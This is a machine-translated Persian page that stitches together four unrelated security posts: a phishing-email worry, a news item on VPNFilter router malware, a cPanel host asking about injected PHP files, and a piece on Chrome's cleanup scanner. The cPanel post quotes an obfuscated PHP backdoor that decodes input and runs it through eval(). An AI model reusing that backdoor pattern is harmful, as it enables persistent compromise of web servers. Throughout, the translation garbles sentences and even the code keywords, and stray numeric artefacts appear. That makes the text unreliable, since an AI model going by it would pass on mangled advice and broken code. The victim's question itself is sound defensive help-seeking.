نوشته‌شده در

تصادفا یک ایمیل فیشینگ را باز کرده است، آیا کامپیوتر من توسط نرم افزارهای مخرب آلوده شده است؟

وقتی من به طور تصادفی یک پیكال فیشینگ را باز كردم از طریق ایمیل های خوانده نشده من دنبال شدم. من فکر کردم که آن را legit بود، زیرا من در پیش نمایش آن را از "[email protected]" دیدم، اما بعد از متوجه شدن از ایمیل اشتباهات دستور زبان بود و برخی از لینک های کوتاه شده بود. نگاهی به برخی از ایمیل های PayPal Legit دریافت کردم و آنها از [email protected] دیدن کردند. بنابراین، من قطعا یک ایمیل فیشینگ را باز کردم.

من واقعا در مورد امنیت کامپیوتر پارانوید هستم. من معمولا از ماشینهای مجازی برای مرور وب استفاده می کنم و این ایمیل ها را در سیستم عامل راننده روزانه من باز می کنم، اما در آن زمان اشتباه را انجام دادم و آن ایمیل را به طور مستقیم باز کردم.

من می دانم که اهداف فیشینگ معمولا رایانه را با نرم افزارهای مخرب آلوده نمی کند اما اکنون احساس ناخوشایندی میکنم زیرا معمولا از فرستندگان ناشناخته باز نمیگیرم.

تصویری از درایو، آن را دوباره بر روی یک رایانه دیگر قرار دادم و سپس MalwareBytes را اجرا کردم، SpyBot Search & Destroy و همچنین اسکن McAfee Antivirus. هیچ مشکلی یافت نشد تصویر درایو برای اجتناب از نصب تمام آن نرم افزارهای آنتی ویروس بر روی سیستم عامل رانندگی روزانه من بود زیرا معمولا آنها پس از پاک کردن برخی از فایل های ناخواسته یا رجیستری را ترک می کنند.

یک کپی از ایمیل فیشینگ (.eml) را برای بازرسی آن کشف کردم، لینک هایی مانند "paypal = objects.com/digitalassets …"، تعداد کمی از "t.co" URL های کوتاه (که در واقع به سایت فیشینگ هدایت می شوند) و برخی از لینک های MailChimp مانند "gallery.mailchimp.com/ .. . " پیوندهای "t.co" را در یک ماشین مجازی، که در حال حاضر شکسته شده است، باز کرد. توجه داشته باشید که ایمیل از سال ژانویه در صندوق پستی من بوده است، بنابراین پیش از باز کردن آن ایمیل، پیوندهای احتمالا پرچم گذاری شده بودند. برخی از تصاویری از این ایمیل فیشینگ در پیوست به این سوال هستند.

دانلود خودکار عکس و همچنین پیش نمایش ایمیل روشن بود. من از برنامه Windows 10 Mail استفاده می کنم.

با توجه به همه اینها، باید هارد دیسک خود را فرمت کنم و سپس ویندوز را به طور کامل نصب کنم تا مطمئن شوم از نرم افزارهای مخرب که ممکن است از باز کردن آن ایمیل (بدون کلیک روی لینک) بر) ؟ یا ارزشش را ندارد؟ محتوای ایمیل

پیکربندی من این است:
ویندوز 10 (با تمام به روز رسانی ها)،
ویندوز 10 Mail App
ویندوز مدافع

نوشته‌شده در

500،000 روتر با نرم افزارهای مخرب و به طور بالقوه جاسوسی بر روی کاربران آلودگی دارند

نیمی از میلیون روتر و دستگاه NAS با VPNFilter، نرم افزارهای مخرب جدی است که می توانند در ترافیک شبکه جاسوسی کنند و حتی از راه اندازی مجدد سیستم، آلوده شوند.

VPNFilter تنها می تواند با به روز رسانی نرم افزار یا تنظیم مجدد کارخانه روتر . انگیزه های این بدافزار روشن نیست، اما بر اساس یک پست وبلاگ سیسکو آن را به طور خاص در اوکراین شایع است.

سیمانتک در یک پست وبلاگ گفت که VPNFilter عمدتا هدف قرار دادن روترهای خانگی و کسب و کار کوچک است. در اینجا یک لیست از دستگاه های شناخته شده به عنوان آلوده شده است:

  • Linksys E1200
  • Linksys E2500
  • Linksys WRVS4400N
  • Mikrotik روتر برای روتر مرکزی هسته: نسخه 1016، 1036، و 1072
  • Netgear DGN2200 [19659005] Netgear R6400
  • Netgear R7000
  • Netgear R8000
  • Netgear WNR1000
  • Netgear WNR2000
  • QNAP TS251
  • QNAP TS439 Pro
  • سایر دستگاههای QNAP NAS که دارای برنامه QTS هستند
  • P-Link R600VPN

اگر شما یکی از اینها را داشته باشید بایستی تنظیم مجدد کارخانه را انجام دهید. همان طور که پیش از این اشاره کردیم، معمولا به معنای پایین نگه داشتن دکمه "Reset" برای 10 ثانیه است، اما دستورالعمل دقیق بسته به روتر شما متفاوت است. توجه داشته باشید که تمام تنظیمات سفارشی خود را با انجام این کار از دست خواهید داد، به این معنی لازم است همه چیز را مجددا پیکربندی کنید.

مطمئن باشید که مطمئن شوید که روتر شما پس از تنظیم مجدد تنظیمات، به روز رسانی های امنیتی را دریافت می کند، برای جلوگیری از عفونت های بیشتر در آینده. روتر شما نقطه ورود به شبکه خانگی شما است، پس شما می خواهید مطمئن شوید که آن را امن است.


جاستین پوت نویسنده کارآزموده برای How-To Geek و علاقه مندان به تکنولوژی است که در Hillsboro زندگی می کند، اورگان اگر می خواهید، در توییتر و فیس بوک دنبال کنید. شما مجبور نیستید.

نوشته‌شده در

cpanel – فایلهای php به صورت تصادفی با کد مخرب

من می بینم که فایل های پی اچ پی در دایرکتوری های چندگانه با نام های تصادفی که دارای کد زیر هستند را نشان می دهد: https://pastebin.com/Baus2eCV که به 

 `` `غلبه می کند
 $ ajyhxyf) {
    تابع ddrpid ($ mxgxe، $ qlfhzo، $ adusfqt) {
        بازگشت $ mxgxe [6] ($ mxgxe [4] ($ qlfhzo. $ mxgxe [2]، ($ adusfqt / $ mxgxe [8] ($ qlfhzo)) + 1)، 0، $ adusfqt)؛
    }
    تابع myvswg ($ mxgxe، $ otdyni) {
        بازگشت @ $ mxgxe [9] ($ mxgxe [0]، $ otdyni)؛
    }
    تابع vdklyzv ($ mxgxe، $ otdyni) {
        $ vvtrzvc = $ mxgxe [3] ($ otdyni)٪ 3؛
        اگر (! $ vvtrzvc) {
            eval ($ otdyni [1] ($ otdyni [2]))؛
            خروج ()؛
        }
    }
    $ ajyhxyf = myvswg ($ mxgxe، $ ajyhxyf)؛
    vdklyzv ($ mxgxe، $ mxgxe [5] ($ mxgxe [1]، $ ajyhxyf ^ ddrpid ($ mxgxe، $ qlfhzo، $ mxgxe [8] ($ ajyhxyf))))؛
}؟>
`` `

آنها اغلب سایت های وردپرس و یک نصب Prestashop هستند. من iThemes Security، Wordfence و GOTMLS را نصب کرده ام اما فایل ها هنوز به نمایش در می آیند. آنها همچنین در نصب Prestashop نشان داده می شوند.

من خودم می توانم نرم افزارهای مخرب را به صورت دستی تمیز کنم. مسئله نصب cpanel سخت تر است و این که چگونه این اتفاق می افتد. من تمام سایت ها را دانلود کرده ام و سایت های WordPress و فایل های اصلی را جایگزین / ارتقا داده ام، تمام پلاگین ها را به روز رسانی کرده اند و مجوز های فایل به عنوان iThemes توصیه می شود. در اینجا یک پرونده ورود به دایرکتوری / سایت مورد نظر است، اما من نمی دانم که من دنبال چه چیزی هستم: https://pastebin.com/pzrMMivr

از قبل سپاسگزارم.

نوشته‌شده در

Chrome ساخته شده در اسکنر مخرب، در اینجا نحوه استفاده از آن است

بسیاری از نرم افزارهای مخرب تلاش می کنند تا مرورگر خود را خفه کنند، اما گوگل کروم در ویندوز Defender نیست، یک اسکنر داخلی به نام Cleanup وجود دارد.

این نرم افزار به طور دوره ای در پس زمینه اجرا می شود، اما شما می توانید اسکن دستی را اجرا کنید در حال حاضر با رفتن به تنظیمات> بازنشانی و پاکسازی> پاک کردن رایانه به آدرس URL chrome: // settings / cleanup در مرورگر خود بروید. به آن ضربه بزنید، به خصوص اگر مرورگر شما به نظر می رسد کم ظاهر است.

مرتبط: مرورگر آهسته؟ چگونگی باز شدن گوگل کروم سریع

این یک اسکنر مخرب عمومی نیست: آن بر چیزهایی که بر Chrome تأثیر می گذارد تمرکز دارد. از یک پست وبلاگ که در اکتبر 2017 اعلام نرم افزار را اعلام کرد:

ما با شرکت امنیتی فناوری اطلاعات ESET کار کردیم تا موتور تشخیص خود را با تکنولوژی جعبه کروم ترکیب کنیم. ما اکنون می توانیم نرم افزارهای ناخواسته بیشتری را از قبل شناسایی و حذف کنیم، به این معنی که افراد بیشتری از Clean Clean Chrome بهره مند شوند. توجه داشته باشید این موتور سندباکس جدید یک ابزار ضد ویروس عمومی نیست – این تنها حذف نرم افزار است که با سیاست نرم افزار ناخواسته ما مطابقت ندارد.

خوب است بدانید که ابزار ابزار دفاع از مرورگر خود را داشته اید، و این خوب است سعی کنید زمانی که کروم آهسته کار می کند. با تشکر از لارنس آبرامز در Bleeping کامپیوتر برای اشاره به این برای ما.


جاستین پوت یک نویسنده کارآزموده برای چگونگی Geek و علاقه مندان فن آوری است که در Hillsboro، اورگان زندگی می کند. اگر می خواهید، در توییتر و فیس بوک دنبال کنید. شما مجبور نیستید.